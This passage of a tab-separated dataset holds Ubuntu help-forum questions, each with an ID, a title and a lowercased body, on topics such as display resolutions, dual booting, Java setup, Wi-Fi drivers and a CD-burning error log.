packets:18694 errors:0 dropped:0 overruns:0 frame:0 tx packets:12035 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:22755906 ( 22.7 mb ) tx bytes:1269060 ( 1.2 mb ) networkmanager tool state : connected ( global ) - device : wlan0 [ ntcc ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : connected default : yes hw address : 60:6c:66:86:81 : c0 capabilities : speed : 72 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) pln_omini_1 : infra , d4 : ca:6d:9d:21:09 , freq 2447 mhz , rate 54 mb/s , strength 25 *ntcc : infra , fe:85 : de:78:5c:91 , freq 2462 mhz , rate 54 mb/s , strength 80 wpa2 connectify-me : infra , 18:3d : a2:4a : bf:3d , freq 2462 mhz , rate 54 mb/s , strength 92 wpa2 irl-bits : infra , 84:1b:5e:3a:33:86 , freq 2462 mhz , rate 54 mb/s , strength 19 wpa2 androidap : infra , 20:02 : af:3b:91:84 , freq 2437 mhz , rate 54 mb/s , strength 89 wpa2 plasmodium : infra , c0:3f:0e : eb:87:48 , freq 2462 mhz , rate 54 mb/s , strength 20 wpa2 ipv4 settings : address : 192.168.150.107 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.150.1 dns : 192.168.150.1 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : b8 : ca:3a : d7:67 : f5 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off
331019	xubuntu 13.04 panel	i have xubuntu 13.04 installed on my laptop . i uninstalled abiword and installed libreoffice . my question is how do i add writer , calc and impress to the panel ? i 've gone into add new items but it does n't show libreoffice . i 've tried dragging a dropping but that does n't seem to work .
331022	how to disable ssh access & sftp access but keep ftp access ?	i do n't know that much yet about servers so i am stuck right now , but i was wondering if its possible to disable ssh access & sftp for a certain user but allow the ability to use ftp access and only access a certain directory . if you have any questions please ask
331027	hyper-v frambuffer driver not working correctly	running the up to date alpha of xubuntu 13.10 on hyper-v ( windows 8 pro ) i noticed the included hyper-v frambuffer driver does not work as expected . according to the commit message ( http : //git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/ ? id=68a2d20b79b105f02dcbc52c211d7e62f98996b7 ) the version included in kernel 3.10 should allow full hd resolution and fix the double mouse curser issue . unfortunally neither of that work here . kernel version is 3.10.0-6. lsmod confirms the hyperv_fb module is loaded . anybody has a clue how to make the framebuffer work as expectd ? edit : i filed a bug about this issue : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1218995
331028	wubi after windows 8 reset	i have windows 8 running on my pc and ubuntu installed through wubi . what will happen to my ubuntu if i reset my windows 8 . ( resetting windows 8 uninstalls all 3rd party applications , will that delete ubuntu files ? )
331037	how do i know if my ssd is damaged ?	when i use 'dd ' to make an image of my sad , i get the message : dd : /dev/disk1 : input/output error i 've tried on mac and ubuntu ( the mac output is above ) and the result is the same . my question is : what is wrong with my one week old sdhc card ( kingston class 4 , 8gb ) ? and more importantly , what tools ( preferably gui ) exist on ubuntu to analyse and fix this problem ?
331038	how to install 32 bit ubuntu on 64 bit machine	i am using ubuntu 12.04 lts ( 64bit ) in 64 bit machine . but i want to use a 32-bit operating system ( either 12.04 or 8.04 ) , i tried to do it using bootable pen drive but it failed , while i have alreay changed my os from 12.10 ( 64 bit ) to 12.04 ( 64bit ) using bootable pendrive . any kind of help will work .
331039	i want to open thunderbird at system start up , but keep it minimised	i am running ubuntu 13.04 , and wish to do the following : start thunderbird at boot up - i am aware of how to do this and need no support with this . as well as running at start up , i also want the thunderbird window to remain minimised to the dash -- this is the area that i am unable to find a solution for and am not sure if it is possible really appreciate any guidance - thanks
331040	xubuntu 13.04 : how to hide backup files on desktop ?	i just changed from ubuntu 13.04 to xubuntu 13.04 in an attempt to improve the performance of my slightly outdated notebook . everything apparently went fine except that my desktop is now cluttered with temporary backup files . i can easily remove them in the file manager by unclicking `` show hidden files '' , but this does not have any effect on the desktop itself . in want of a better solution , i have considered redirecting my temporary backup files to a folder other than the desktop folder , but i am not sure how to do that either . if anybody knows how to either hide the backup files from my desktop , redirect them to another folder , or work some other kind of magic , i would be most grateful .
331043	why does the kde login screen still lead me to gnome ?	this all occurred after i ( 1 ) built/installed ardour 3.3 ( 2 ) used the automatic updater to install suggested updates and ( 3 ) installed wine , tried to open the configuration file , everything stopped responding , and i shut the computer down . i was then met with a black screen with a command line ( tty1 ) . so i installed ubuntu-desktop , which loaded the login screen but then would n't load the actual desktop ( it would just revert to login ) . then i installed gdm , which loaded the desktop but then brought annoying pop-up messages of `` system problem detected '' etc . now i 'm trying to install kubuntu-desktop with hopes that it will be different , but if i 'm wrong in my solution , please correct me . my windows have white lines around the edges that change size , leading me to think there 's some problem with the x system ( when i used autoremove after installing all the necessary packages for ardour , a lot of x packages were uninstalled ) . also , the display does n't seem quite aligned ... it 's just a tad too big , so the edges of my web browser or applications often get cut off ( i.e. , i have to read from the second or third letter of a word if it 's at the edge ) . it 's not so much that i want the kubuntu-desktop , just that whatever desktop i have works smoothly . i took out my nvidia graphics card so i did n't have to deal with more on top of it . so now , i 'm just running my basic desktop with an i5 , 4 gb ddr3 memory , and a tb hard drive .
331046	alternative to yad/zenity for unity	in ubuntu 13.04 yad and zenity notification icons are n't showed in unity . i have written a script to use notification icon to alert me about lftp download progress . is there any alternative that it works in unity ?
331050	which filesystem should i use to format my external backup hdd ? btrfs ?	i have a new external usb drive i plan to use for storing backups only . ( it is a wd red 2tb nas hard drive sata iii model wd20efrx mounted in a usb enclosure . ) the drive came without a partition table . i partitioned it with gdisk ( gpt ) . should i use the btrfs file system ? i 'm using btrfs on my internal hdd and it has been trouble-free since i first installed kubuntu 12.04 last year . but i 'm wondering if it would be smarter to partition this backup storage drive with ext4 . fyi , it seems like the arguments that btrfs is not production ready are old . here 's some info i found . matthias eckermann , senior product manager at suse enterprise linux , says that btrfs is ready for production systems , and as of suse linux enterprise 11 sp2 btrfs is officially supported . also , according to the btrfs wiki , `` since february 2012 there are two vendors who support btrfs in their distributions , oracle and suse . ''
331055	installing edubuntu 13-04 on usb without downloading any other iso 's than what i already have	i have the edubuntu-13.04-dvd-amd64 iso , and the wubi installer , but ca n't get the installer to use the iso and put edubuntu on my 14 gb flashdrive . is it possible to install edubuntu on my flashdrive using just the files that i already have without downloading any others ? ( internet is slow ) note that i got wubi on a 4 gb flashdrive using universal-usb-installer-1.9.3.7 also note that i used saucy-desktop-i386 iso to download wubi .
331062	what is the functional difference between sudo su and sudo -i ?	why is one preferred over the other in this example ? sudo su echo `` options iwlwifi 11n_disable=1 '' > > /etc/modprobe.d/iwlwifi.conf exit please provide links to ubuntu documentation .
331073	gdbus.error : org.freedesktop.dbus.error.unknownmethod	i am getting the following error gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gnome.settingsdaemon.xrandr_2 ' on object at path /org/gnome/settingsdaemon/xrandr whenever i try to apply any changes to the display setting in the ubutnu 12.04 . i have a external monitor dell s2240l connected to the laptop , both the display are working and mouse and windows can be moved between both the display without any problem . i tried the answers from this question but they do not help .
331080	qt library : linked by ld.so.conf.d/qt.conf but were not found by installation package	i have problem while installing the program rthlibs . i have linked the library of qt5.1.0 with the standard library via this command : code : sudo sh -c `` echo /usr/local/qt5.1.0/5.1.0/gcc_64/lib > /etc/ld.so.conf.d/qt5.conf '' and then code : sudo ldconfig -v which shows the library already linked . however the rthlibs program ( the one i want to install ) complain : code : rthlibs depends on libdcmtk2 ( > = 3.6.0 ) ; however : package libdcmtk2 is not installed . rthlibs depends on liblog4cxx10 ( > = 0.10.0 ) ; however : package liblog4cxx10 is not installed . rthlibs depends on libqt5widgets5 ( > = 5.0.1 ) ; however : package libqt5widgets5 is not installed . rthlibs depends on libqt5core5 ( > = 5.0.1 ) ; however : package libqt5core5 is not installed . rthlibs depends on libqt5core5 ( > = 5.0.1 ) ; however : package libqt5core5 is not installed . rthlibs depends on libqt5opengl5 ( > = 5.0.1 ) ; however : package libqt5opengl5 is not installed . rthlibs depends on libatlas3gf-base ( > = 3.8.4 ) ; however : package libatlas3gf-base is not installed . rthlibs depends on libqhull5 ( > = 2009.1-2 ) ; however : package libqhull5 is not installed . rthlibs depends on libqt5script5 ( > = 5.0.1 ) ; however : package libqt5script5 is not installed . rthlibs depends on libqt5sql5 ( > = 5.0.1 ) ; however : package libqt5sql5 is not installed . rthlibs depends on dpkg : error processing rthlibs ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of sbwavegen : sbwavegen depends on libgnustep-base1.24 ( > = 1.24.0 ) ; however : package libgnustep-base1.24 is not installed . sbwavegen depends on libgnustep-gui0.22 ( > = 0.22.0 ) ; however : package libgnustep-gui0.22 is not installed . i search the library by using sudo ldconfig -v again and notice that some library ( already linked and shown up ) is somehow similar to the one `` rthlibs '' complains . e.g : libqt5widgets.so.5 libqt5core.so.5 libqt5opengl.so.5 ... . they were already in the library but the program complains . why ?
331081	keyrings/seahorse : disabling default setting of auto-unlock at login for secondary keyrings	i have multiple keyrings , one of which unlocks certain encrypted files that are cloud-synced . i unlock this keyring at almost every login , but it is still important to me that the password for the keyring is much stronger than my default login/sudo password . what is vexing is that each time the keyring 's password entry dialogue appears , the auto-unlock box is checked by default . this is the one that says `` automatically unlock this keyring whenever i 'm logged in . '' i never want to do this : so long as the keyring is locked , i do n't want this keyring password or the contents to be viewable by any user without its specific password ( even a root user ) . is there any way to configure the passwords and keys manager -- or some other related software -- to untick that box by default ? i 'm tired of having to manually unselect it every time or accidentally just hitting `` enter '' and having to go into the manager settings and de-associate the secondary keyring from the login keyring . any help is much appreciated . -ac
331082	display not showing properly in ubuntu 13.04 . 16:9 resolutions missing	i have installed ubuntu 13.04 on a pc with an integrated intel display intel速 ironlake desktop x86/mmx/sse2 . the display is stuck to 1024x768 and can only be changed to 800x600 . how do i get higher and proper resolutions in 16:9 on my monitor ?
331093	ubuntu compatible laptops	i am looking to buy either of the following two laptops but wanted to ensure they were compatible with ubuntu . both seem to match laptop names as 'okay ' but the details of the specs seem to be slightly different , which leaves me confused ! hpm6-1205so/i5/8gb ( hp envy m6 ? ? ) hp15-j028eo/i5/12g ( hp envy 15 ? ? ) your help much appreciated . many thanks , melanie
331094	sound abnormally quiet in lubuntu 12.04	the audio output has suddenly become abnormally shy due to unknown circumstances . i have to have the volume up to 100 % to make it easily audible anything below 80 % is basically a whisper/inaudible . i did alsamixer in the terminal , but everything was maxed out so there was nothing i could do . once when i was having an audio problem ( i believe i had no audio output at all after installing mumble ) i uninstalled something very important to the sound , and reinstalled it and that fixed everything , but i ca n't remember what it was . is there anything i can do to increase the max sound ? edit : ok , so i tried uninstall/reinstall pulseaudio , getting updates etc , but i decided that i 'd just get a 3rd party audio control system ( pavucontrol ) and i can now not only have i fixed my problem but i now have full control of the volume of different applications in lubuntu 12.04 ,
331096	how can i regain access to my windows 7 after installing ubuntu 13.04 alongside windows 7	i am very new to ubuntu . chose the option to load ubuntu alongside windows 7 from my flashdrive . when i was prompted to set the partition , i allowed it to do it automatically ( to avoid issues ... so much for that ) . everything seemed to go fine but my pc now just boots into ubuntu 13.04 as if it is the only os , there is no option to choose windows 7 . i tried boot-repair ( recommended settings option ) to no avail . i have n't tried anything under the advanced options so that i wo n't make it worse before getting some feedback . boot-repair supplied this paste bin : http : //paste.ubuntu.com/5968556/ in the past , i had to have by pc repaired after a nasty virus . it 's an hp pavillion 1230n that had windows xp originally , but when i got it after repairs it had windows 7 ultimate 7601 build ( i think ) anyway , it always had a pop up that i needed to get genuine windows . i also noticed vista listed on my pastbin but i 've never used vista on my pc . i downloaded gparted but have n't made any changes . i hope i 've provided enough information . any help would be greatly appreciated or just point me in the right direction . i 've seen many similar posts with small differences and countless `` solutions '' however i do n't know enough to be able to identify if what worked for them would work for me or make it harder for someone to help me . thanks in advance edit : @ superweijiafeng sudo fdisk -l shows : disk /dev/sda : 200.0 gb , 200049647616 bytes 255 heads , 63 sectors/track , 24321 cylinders , total 390721968 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1549f232 device boot start end blocks id system /dev/sda1 2048 30722047 15360000 7 hpfs/ntfs/exfat /dev/sda2 * 30722048 30926847 102400 7 hpfs/ntfs/exfat /dev/sda3 30926848 316314777 142693965 7 hpfs/ntfs/exfat /dev/sda4 316315646 390721535 37202945 5 extended /dev/sda5 316315648 388757503 36220928 83 linux /dev/sda6 388759552 390721535 980992 82 linux swap / solaris disk /dev/sdb : 2003 mb , 2003795968 bytes 32 heads , 63 sectors/track , 1941 cylinders , total 3913664 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2c46034e device boot start end blocks id system /dev/sdb1 * 63 3913055 1956496+ 6 fat16 @ superweijiafeng i never see any options to boot into vista or anything when booting . it just goes straight into ubuntu . when i hit enter during booting to get into settings the only thing i can do is boot into ubuntu from hard drive or boot into ubuntu from my jump drive .
331103	how do i save my ubuntu sdk project to launchpad ?	i 've got a program that i 'd like to make , but i do n't know how to put it on launchpad . how do i do that ?
331110	how can i use ubuntu 12.04 to install its driver for a wireless usb adapter in a ubuntu 10.04 ?	how can i use an installed ubuntu 12.04 system to install its driver rt2800usb ( for a ralink rt3070 net adapter ) , or a similar one that works , in ubuntu 10.04 ? is it possible ? thank you the driver 's version for 12.04 is 3.2.0-23
331111	sudo apt-get install problem	i installed amd proprietary driver and when reboot , xserver wont come up . after that i purged xserver and proprietary driver and try to install xserver again . but it wont work . apt-get install wont work . it says has no installation candidate or reading package lists ... done building dependency treee reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and not upgraded how to solve it ?
331112	get the most recent complete installation dvd of linux and ubuntu	how do i get the complete installation dvd more recent of ubuntu and related software ? looked the site but did n't find how to , also there is little information in portuguese so i need a professional installation dvd .
331118	can ubuntu be installed on my system	i apologize if this is a duplicated question asked a thousand times , but at the end of 3 days trying to install ubuntu 12.04 i am close to giving up . i have managed to install it , but i am only able to reach a terminal screen which i am assuming is because of the amd switchable graphics drivers which i need to install . i have been trying to follow the answers to these questions : • what is the correct way to install ati catalyst video drivers ( fglrx ) ? • my computer boots to a black screen , what options do i have to fix it ? • installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) ... all of which is to no avail . it would help if i knew how to connect to my blink usb internet from within the terminal screen . any help would be appreciated . i find it confusing that the installer is able to run a gui interface , yet once installed it will not even work in fail safe graphics mode . • os : microsoft windows 8 , version 6.2.9200 build 9200 • system manufacturer : hewlett-packard , hp pavilion 15 notebook pc , x64-based pc • system sku : e4x53pa # abg • processor : amd a6-5200 apu with radeon ( tm ) hd graphics , 2000 mhz , 4 core ( s ) , 4 logical processor ( s ) • graphics : amd radeon hd 8670m , amd radeon hd 8400 • bios version/date : insyde f.15 , 13/06/2013 , smbios version 2.7 , embedded controller version 2.16 , uefi bios mode • baseboard manufacturer : hewlett-packard , platform role : mobile • secure boot state : off • pcr7 configuration : binding not possible • windows directory : c : \windows • system directory : c : \windows\system32 • boot device : \device\harddiskvolume2 • hardware abstraction layer : version = `` 6.2.9200.16442 '' • installed physical memory ( ram ) : 8gb • total physical memory : 7.47gb • available physical memory : 5.64gb • total virtual memory : 8.59gb • available virtual memory : 6.38gb • page file space : 1.13gb • page file : c : \pagefile.sys • hyper-v - vm monitor mode extensions : yes • hyper-v - second level address translation extensions : yes • hyper-v - virtualization enabled in firmware : no • hyper-v - data execution protection : yes
331120	how do i delete my `` ./.adobe/flash_player '' folder ?	i 'm not good at ubuntu . i ca n't watch hbogo . i googled it and found out that i needed to install libhal . i think i did that but do n't know how to check . but my error code changed so i think i did in fact install it . so i googled the new error code and it appears that i need to delete the ./.adobe/flash_player folder . so i clicked on the file cabinet icon on the launcher bar but i ca n't even find that folder . i get error code : 3323 corrupt global state store sub error code = 1090519053 this is the thread that says i need to delete the folder , i have same symptons as this poster : forums.adobe.com/thread/964787
331121	problem upgrading from 3.2.0-51-generic to 3.5.0-37-generic	i 'm running ubuntu 12.04 and tried to upgrade the kernel from 3.2 to 3.5 : following a suggestion found here , i ran sudo apt-get install linux-image-generic-lts-quantal i had a little trouble with it , but after reboot i have uname -r 3.5.0-37-generic however , attempting to install the new x stack results in an error : sudo apt-get install xserver-xorg-lts-quantal reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gvfs-daemons : depends : x11-utils e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . any suggestions ? i tried `` sudo apt-get install gvfs-daemons '' and `` sudo apt-get install x11-utils '' , but both were up to date .
331122	persist screen resolution in ubuntu 13.04	i 've installed ubuntu 13.04 , but i cant persist the screen resolution . it take by default the 1024x768 , but i want to configure it with 1280x1024 . these commands : xrandr -- newmode `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync and then xrandr -- addmode vga1 `` 1280x1024_60.00 '' these two commands works well , but i dont want to run these two every time i boot my pc ! ! i tried to persist this configuration in the /etc/x11/xsession , but isnt working . can you please give a way to persist this in ubuntu 13.04 ? its very strange , because in previous version of ubuntu , persist screen resolution configuration was n't a problem .
331130	mercury avatar ( elantech ) touchpad multitouch and gesture are not supported ?	i 'm a bit of a linux noob , but i 'm smart enough to figure out how to update the software and such . i 've run apt-get update and upgrade and installed touchegg . i can not figure out how to enable multitouch and gestures . i would honestly settle for just two finger vertical scrolling . i can live without pinch zoom , rotate , etc ( but would be nice to have ) , but i 'm going nuts without an easy way to scroll . i 'm honestly just not experienced enough to know what to look for , and i 've done more than my fair share of googling , and now i think it 's time to ask for help . anyone know what needs to be done here to get two finger scroll ( and hopefully more ) enabled ?
331134	how to mount ipod touch 4th generation 16gb	i am used to the easy way on windows . just open the itunes and voila your work is done . here it is a bit different i see . i tried using rhythmbox and also downloaded gpod . but seems like rhythmbox only supports upto 3rd generation ipods . my being the 4th gen. i am unable to load files or even mount it easily.for this i have downloaded gtkpod ipod manager . but cant really understand nothing . can you please help , and tell me how to go about it : (
331140	how do i uninstall usb wireless divers that did n't work ?	computer/os stats : old ( 5 yrs ? ) dell desktop computer ubuntu 12.04 is the only os installed mem : 1.5gib processor : intel pentium 4 2.8ghz os type : 32 bit disk : 37.8gb background info i moved my desktop into another room without access to the ethernet cord i previously was using . i was hoping it would be a simple thing to get a wireless card to access the internet with this computer , but it has been difficult and i have n't had success yet . i tried 3 different wireless usb adapters ; unfortunately , i ca n't remember all of the details of those 3 because i already returned them to the store since i could n't get them to work . i know that the companies were belkin , linksys and netgear . i was trying to use the instructions on this and other various sites to download drivers , using the program ( wine ) , but honestly i am a complete newbie at all of this and did n't know what i was doing ( i still do n't ) , so i do n't know exactly what i installed or where it is . i finally returned them all of the failed-attempt wireless cards to the store and ordered a d-link wireless n nano usb adapter online , after i had originally looked for the usb wireless adapters from this site : https : //www.thinkpenguin.com/catalog/wireless-networking-gnulinux unfortunately , i think amazon sent me the wrong one because the d-link i have in front of my says nothing about being compatible with linux ; so i 'm probably going to send it back and try again for a linux supported wireless usb adapter ( what i thought i ordered from amazon ) . question the latest wireless router instructs me to uninstall all previous related programs . since i installed them using the ctrl+alt+t and did n't know what i was doing , i can not find them to uninstall them with the usc . i tried the command : apt-get -- purge remove linksye as well as other possible program names , but i do n't even know what the actual program names were . i do n't know how to find them , either . so my guess is i need to : find out what the names of the 3 programs were uninstall them - all using the terminal i have no idea how to do this . help please ?
331144	active download does not supersede suspend	i 'm using ubuntu 13.04 . my system is set to suspend after 10 minutes of idle time . i like this , but if i have a download going , the system will go into suspend anyway and the download will pause . if i want to start a big download and go afk for a while , do i really have to go into the power settings and disable suspend ? this does n't seem like it should be necessary . surely , ubuntu is supposed to prevent automatic suspension , or continue the download in the background , while the system is suspended . this happens with firefox , chromium , and synaptic package manager . i have n't tried to replicate this problem with other applications that include a download function , but those three are the ones i use the most . is there a way to fix this ? also , i 'm worried that if i was to be installing a big package and went afk for > 10 minutes , that process would get suspended too , and damage the installation .
331145	using python 3.3 on kubuntu 13.04	i am starting with my first python project and choose to go with version 3.3 of the language . i 'm doing this on a kubuntu 13.04 x64 box . i appear to have both 2.7 and 3.3 installed ( at /usr/bin/python and /usr/bin/python3.3 ) . now i want to use some existing python packages ( such as python nose ) in my project . i tried installing nose using pip , but it looks like it is now installed for 2.7 , and not 3.3 . can i change the main python version of my system to 3.3 ( which it breaking horribly - i know stuff in ubuntu uses python , so am rather concerned this breaking my system ) . and if not , how can i best get the packages that i need to work on my 3.3 project ?
331147	install on msata that is seen as `` sdb '' ?	i am installing ubuntu on my laptop that has 500gb hdd and a 32gb msata ssd . the msata is always recognized as sdb and cant change it to sda . tried to change my bios boot order to the secondary drive first . is it okay to install ubuntu on sdb ?
331149	how to get windows booting after uninstalling ubuntu ?	i had a dual boot with ubuntu 13.04+ windows 8 , windows 8 being the primary system . i decided i do n't need ubuntu at the moment , so i wanted to uninstall it . here are the steps i took . used easybcd to write windows into the mbr deleted the linux partitions , and expanded my c : \ drive to take the free space after doing these steps , my windows hdd was back to normal , and i had more gb 's as expected . when i tried to reboot , i get the error : no such partition , with a grub command prompt . i 'm assuming this is because my computer had grub as the default bootloader set , and since i erased ubuntu , it does n't know what to do . how do i boot back into windows ? i do n't have access to my windows 8 disk , but i do have a usb key with ubuntu 13.04 live on it .
331151	command prompt in nautilus window	i am on an acer aspire 5920 , running ubuntu 12.04 32 bit . earlier , by mistake , i exited a terminal during : sudo apt-get upgrade the computer said there were internal errors , and i should restart . so i did , and it restarted fine , but now when i open a folder with nautilus it has a command prompt at the top of the folder , everything else displays fine , just the addition of command prompt . i also install nautilus-terminal for the right click - open in terminal feature . 1- is this a new feature of nautilus-terminal or a bug from closing the terminal by mistake ? 2- if it is a bug , how do i fix it ? 3- if it is n't a bug , should i do anything to be sure i did n't do anything to damage my file system by exiting : sudo apt-get upgrade 4- if it is a bug , how can i suggest to the developers of nautilus or nautilus-terminal this as a feature ? screenshot of nautilus : screenshot of terminal running command : sudo dpkg -- configure -a & & sudo apt-get -f install
331152	changing gnome back to unity	i recently installed the new gnome 3.8 on my ubuntu os thinking it would only add the de to my session manager at log in . i was wrong however . it actually changed the default to gnome ! i prefer unity much more , but can not change it back . how can i fix this ?
331154	computer with ubuntu 13.04 suddenly stopped working	i am new to ubuntu . since mycomputer with xp installed started doing funny thing , i decided to install ubuntu 13.04 . today it stopped suddenly and showing something weird . to be specific i have attached couple of screenshots . i would appreciate any suggestion with this situation . i am thinking this might be an issue with hardware . it would be nice to know what specific thing is doing this funny thing ? edit : as per the suggestion of some friends i have included the graphic card info : 01:00.0 vga compatible controller : nvidia corporation nv44a [ geforce 6200 ] ( rev a1 ) compaq presario sr1514nx
331155	how to swap left alt with left win and use left alt as 3rd level chooser ?	how can i do such things as swap left alt with left win and use left alt as 3rd level chooser ? if i use both the swapping does not take effect but my alt key is 3rd level chooser and win key opens the run prompt ( ? ) . do n't know how it is called . i 've tried xmodmap to change the keys but without success . i 'm using german ( macintosh ) as keyboard layout . thanks for any help .
331156	style names in gtksourceview	in /usr/share/gtksourceview-3.0/styles/kate.xml , i see this line : < style name= '' draw-spaces '' foreground= '' # d3d7cf '' / > what does draw-spaces mean ? is there some resource that explains this and other terms used in the styles found in /usr/share/gtksourceview-3.0/styles/ ? ( there 's a lot of information on syntax highlighting but i do n't want that . )
331160	email encryption for noobs	as everybody knows , emails are being read and stored . i do n't like that so much and installed enigmail , which enables pgp-encryption for emails in thunderbird . it took me two days to install and understand the details . now that it is working i get aware , that i will never really use it , because my family , friends and clients are n't really interested in generating public and private keys . so i wo n't be able to send any encrypted messages , nor will receive them . i 'm searching for a simple way to encrypt emails in ubuntu , without having to bother other people with `` strange '' petitions about software they would have to install to read my emails .
331167	error message when installing chinese input	i have ubuntu 12.04 , and i was trying to install the chinese input . i got the following error message : requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . details : cmap-adobe-cns1 cmap-adobe-gb1 fonts-arphic-ukai fonts-arphic-uming ibus-sunpinyin ibus-table-cangjie ibus-table-cangjie-big ibus-table-cangjie3 ibus-table-cangjie5 ibus-table-wubi libchewing3 libchewing3-data libsunpinyin3 python-glade2 sunpinyin-data ttf-arphic-ukai ttf-wqy-zenhei
331172	ubuntu will not install alongside windows - no option	i have a hp dv6 stock laptop . i had 12.04 installed and all went well with wubi and i loved it . i updated to 13.04 , but it created wifi issues and i was advised to complete a fresh install which i tried , but now , ubuntu wont install alongside windows . it gives me the option to install inside windows . the boot helper keeps giving me errors , such as installation files can not be found and nonetype object does not have attribute fields . i have re downloaded the iso , and tried again but the install alongside is still not there . any advice ?
331175	messed up java in my ubuntu 12.04	i will start from the very beginning on how i made a mess ! ! i needed java programming on my ubuntu 12.04. so , i downloaded net beans setup from the site . when i tried to run the setup , i found that jdk is not installed . i anyway , as i used to do in windows , ( i am a newbie in ubuntu ) , i went to oracle java site , downloaded the rpm package . next , i found that rpm is by default not installed in ubuntu , so i downloaded rpm too via terminal . when i tried to install jdk setup through rpm , it gave error for installing something named `` alien '' . ok ! ! now , i installed alien and finally , something happened to the rpm file . then a message came `` jdk1.70.deb generated '' . whoa ! ! ! i knew this extension , its an installer file for ubuntu , i quickly went to the .deb file via nautilus , n doouble clicked it . my software centre showed that it 's already installed . n he was right ! i found the jdk folder in /usr/java . but still , javac wasnt running ! ! ! i wrote java -version and it showed that openjdk is being used n not my new setup . i searched on net , n found this tutorial by webupd8 . tried to do this too , changed the java folder as per the guide in site . but now , when i try to run the javac -version on terminal , it gives an error : error occurred during initialization of vm java/lang/noclassdeffounderror : java/lang/object n now , even java -version gives the same error ! i was trying to find out , how to uninstall my newly installed java , but havent found anything . n now , java is not working even on my browsers ! please help . n get me out of this mess ! ! ! : ( : (
331176	unable to burn iso	hello trying to burn dban onto a cd r 700mb . using brasero getting an error . here is the log file . checking session consistency ( brasero_burn_check_session_consistency brasero-burn.c:1739 ) braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_set_output_size_for_current_track braseroburnuri stopping braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_session_output_size braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_current_track braseroburnuri burn : // uri found burn : ///quick.txt ; 1 braseroburnuri called brasero_job_set_current_action braseroburnuri called brasero_job_get_current_track braseroburnuri information retrieval for burn : ///quick.txt ; 1 braseroburnuri added file /home/lvl1/downloads/dban-2.2.7_i586/quick.txt ; 1 at /quick.txt ; 1 braseroburnuri information retrieval for burn : ///raid.txt ; 1 braseroburnuri added file /home/lvl1/downloads/dban-2.2.7_i586/raid.txt ; 1 at /raid.txt ; 1 braseroburnuri information retrieval for burn : ///about.txt ; 1 braseroburnuri added file /home/lvl1/downloads/dban-2.2.7_i586/about.txt ; 1 at /about.txt ; 1 braseroburnuri information retrieval for burn : ///isolinux.cat ; 1 braseroburnuri added file /home/lvl1/downloads/dban-2.2.7_i586/isolinux.cat ; 1 at /isolinux.cat ; 1 braseroburnuri information retrieval for burn : ///dban.bzi ; 1 braseroburnuri added file /home/lvl1/downloads/dban-2.2.7_i586/dban.bzi ; 1 at /dban.bzi ; 1 braseroburnuri information retrieval for burn : ///isolinux.bin ; 1 braseroburnuri added file /home/lvl1/downloads/dban-2.2.7_i586/isolinux.bin ; 1 at /isolinux.bin ; 1 braseroburnuri information retrieval for burn : ///warning.txt ; 1 braseroburnuri added file /home/lvl1/downloads/dban-2.2.7_i586/warning.txt ; 1 at /warning.txt ; 1 braseroburnuri information retrieval for burn : ///isolinux.cfg ; 1 braseroburnuri added file /home/lvl1/downloads/dban-2.2.7_i586/isolinux.cfg ; 1 at /isolinux.cfg ; 1 braseroburnuri called brasero_job_add_track braseroburnuri called brasero_job_get_action braseroburnuri finished track successfully braseroburnuri stopping braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_set_output_size_for_current_track braserolocaltrack stopping braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_session_output_size braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_current_track braserolocaltrack no remote uris braserolocaltrack stopping braserochecksumfiles called brasero_job_get_output_type braserochecksumfiles called brasero_job_get_current_track braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_set_output_size_for_current_track braserochecksumfiles stopping braserochecksumfiles called brasero_job_get_output_type braserochecksumfiles called brasero_job_get_current_track braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_get_session_output_size braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_get_current_track braserochecksumfiles called brasero_job_get_current_track braserochecksumfiles called brasero_job_set_current_action braserochecksumfiles called brasero_job_get_flags braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_get_current_track braserochecksumfiles adding graft for checksum file /.checksum.md5 file : ///tmp/brasero_tmp_2c7y1w.md5 braserochecksumfiles called brasero_job_add_track braserochecksumfiles called brasero_job_get_action braserochecksumfiles finished track successfully braserochecksumfiles stopping braserolibisofs called brasero_job_get_action braserolibisofs called brasero_job_get_action braserolibisofs called brasero_job_set_current_action braserolibisofs creating volume 